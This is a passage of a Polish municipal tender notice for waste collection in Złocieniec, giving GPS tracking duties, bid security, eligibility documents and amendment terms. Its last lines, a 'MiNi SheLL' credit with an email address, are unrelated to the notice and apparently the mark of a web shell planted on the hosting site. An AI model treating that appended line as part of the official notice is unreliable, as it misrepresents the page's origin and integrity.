a)bieżące śledzenie pozycji pojazdów wykorzystywanych przez Wykonawcę do wykonywania usług związanych z odbieraniem odpadów komunalnych, w oparciu o wykorzystanie systemu GPS i komunikowanie się z nimi w dowolnym momencie w celu odczytu danych; pamięć w/w danych nt. pracy poszczególnych pojazdów m.in. pozycji, tras i miejsc zbierania odpadów, ze wskazaniem atrybutu czasu - daty, godz. i min., powinna być archiwizowana i odczytywalna przez cały okres realizacji przedmiotu zamówienia,
b)odwzorowanie aktualnej pozycji, miejsca prowadzenia prac i przebytej trasy pojazdu, z dokładnością umożliwiającą jednoznaczne określenie miejsca adresu i czasu wykonywania prac,
c)odtwarzanie i analizę historii pracy pojazdów z okresu realizacji umowy oraz prowadzenie jej rozliczenia na podstawie danych odczytanych z urządzeń monitorujących pracę pojazdów,
d)wyposażenia wszystkich pojazdów wykorzystywanych do realizacji przedmiotu zamówienia 
w urządzenia monitorujące ich pracę,
e)codzienne archiwizowanie danych, o których mowa w lit a), 
Częstotliwość odbierania odpadów od właścicieli nieruchomości - zgodnie z Uchwałą nr XLIV 373 2014 Rady Miejskiej w Złocieńcu z dnia 27.03.2014 r. w sprawie regulaminu utrzymania czystości i porządku na terenie gminy Złocieniec. Opróżnianie pojemników do zbierania odpadów powinno odbywać się z częstotliwością zapewniającą niedopuszczanie do ich przepełnienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium należy wnieść w wysokości 16 000,00 zł słownie: szesnaście tysięcy złotych 00/100 w terminie do dnia składania ofert. Decyduje data i godzina wpływu środków do zamawiającego. 
Wadium może być wnoszone: 
1) w pieniądzu - przelewem na rachunek bankowy zamawiającego nr 38 1020 2847 0000 1102 0009 6719
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w sekretariacie Urzędu Miejskiego w Złocieńcu, ul. Stary Rynek 3.  
3. Wadium może być wniesione w jednej lub kilku formach. 
4. W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać: 
1) zobowiązanie gwaranta banku, zakładu ubezpieczeń do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego beneficjenta gwarancji zawierające oświadczenie, że zaistniały przesłanki jego zatrzymania. 
2) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą, 
3) miejsce i termin zwrotu gwarancji. 
5. Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym. 
6. Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie przez zamawiającego wykluczony a jego oferta zostanie uznana za odrzuconą. 
7. W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że posiada: niezbędne uprawnienia tj.
 a) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, spełniają wymagania określone Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122), 
b) aktualne zezwolenie na transport odpadów w zakresie objętym przedmiotem zamówienia, zgodnie z art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach (dz. U,. z 2013 poz. 21), a po utworzeniu rejestru, o którym mowa w art. 49 ust. 1 ww. ustawy - uzyskania wpisu do tego rejestru, z uwzględnieniem art. 234 ust 2 ww. ustawy, 
c) Wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonali w ciągu ostatnich 3 lat przed terminem składania ofert a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 usługę odbioru odpadów komunalnych (1 umowa od jednego Podmiotu) o wartości minimum 500 000,00zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje, lub będzie dysponował co najmniej następującymi środkami technicznymi: 
a) bazą magazynowo - transportową, która spełnia wymogi Rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U.z 2013 r, poz. 122), 
b) pojazdami i urządzeniami spełniającymi wymogi Rozporządzenia Ministra Środowiska 
z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r., poz. 122): 
-co najmniej 2 (słownie: dwa) pojazdy specjalistyczne przystosowane do odbioru zmieszanych odpadów komunalnych; 
-co najmniej 2 (słownie: dwa) pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych; 
-co najmniej 1 pojazd do odbioru odpadów bez funkcji kompaktującej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w tym zakresie zamawiający nie wymaga od wykonawcy spełnienia warunków szczegółowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony 
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości minimum 500 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, spełniają wymagania określone Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r., poz. 122), 
2.aktualne zezwolenie na transport odpadów w zakresie objętym przedmiotem zamówienia, zgodnie z art. 233 ustawy z dnia 14 grudnia 2012 r. o odpadach (dz. U,. z 2013 poz. 21), a po utworzeniu rejestru, o którym mowa w art. 49 ust. 1 ww. ustawy - uzyskania wpisu do tego rejestru, z uwzględnieniem art. 234 ust 2 ww. ustawy, 
3.Wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzony przez Głównego Inspektora Ochrony Środowiska.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - częstotliwość odbioru odpadów wielkogabarytowych - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku 
do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia 
co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
Zmiany osobowe  zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w specyfikacji istotnych warunków zamówienia, według polityki kadrowej Wykonawcy. Zmiana osób podanych w ofercie wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi SIWZ , a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną osobę. 
Pozostałe zmiany spowodowane następującymi okolicznościami: 
1)siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ, 
2)zmiana obowiązującej stawki VAT, 
3)rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. 
4)zmiany uzasadnione okolicznościami o których mowa w art. 3571 §1 Kodeksu cywilnego. 
5)gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ
6)zmiany powszechnie obowiązujących przepisów prawa w zakresie mających wpływ na realizację zamówienia,
7)oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, 
8)zmiany warunków płatności, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, 
9)zmiany terminu świadczenia usługi i/lub terminu realizacji zamówienia, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji umowy, 
10)zakres przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym w/w zmiana spowodowana może być okolicznościami wynikającymi z regulacji prawnych wprowadzonych po dacie zawarcia umowy, 
11)sposobu wykonywania przedmiotu zamówienia wraz ze skutkami wprowadzenia takiej zmiany, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu zamówienia, wynikającymi z regulacji prawnych wprowadzonych po dacie zawarcia umowy, 
12)technologii wykonywania prac objętych przedmiotem zamówienia, jeżeli wprowadzenie nowej technologii nie będzie powodować podwyższenia wynagrodzenia Wykonawcy oraz powodować będzie niepogorszenie dotychczasowych standardów wykonywania zamówienia, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu zamówienia, 
13)zmiany zakresu części zamówienia powierzonej Podwykonawcom, zmiany Podwykonawcy lub wprowadzenia Podwykonawcy, przy czym w/w zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu zamówienia. 
Określa się następujący tryb dokonywania zmian postanowień umowy: 
1) zmiana postanowień zawartej umowy może nastąpić wyłącznie, za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności, 
2) strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności powodujących konieczność zmiany umowy, 
3) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 
4) zamawiający nie ma obowiązku zmiany postanowień umowy, 
Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
Zamawiający dodatkowo przewiduje możliwość dokonania zmian zapisów zawartej umowy 
w przypadku: 
1. wprowadzenie zmian korzystnych dla zamawiającego, 
2. konieczności wprowadzenia zmian uzależnionych od wystąpienia zdarzenia powodującego, iż  stosunek zobowiązaniowy nie może istnieć w pierwotnym kształcie, 
3. zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zlocieniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Złocieńcu
ul. Stary Rynek 3
78-520 Złocieniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 10:00, miejsce: Urząd Miejski w Złocieńcu
ul. Stary Rynek 3
78-520 Złocieniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com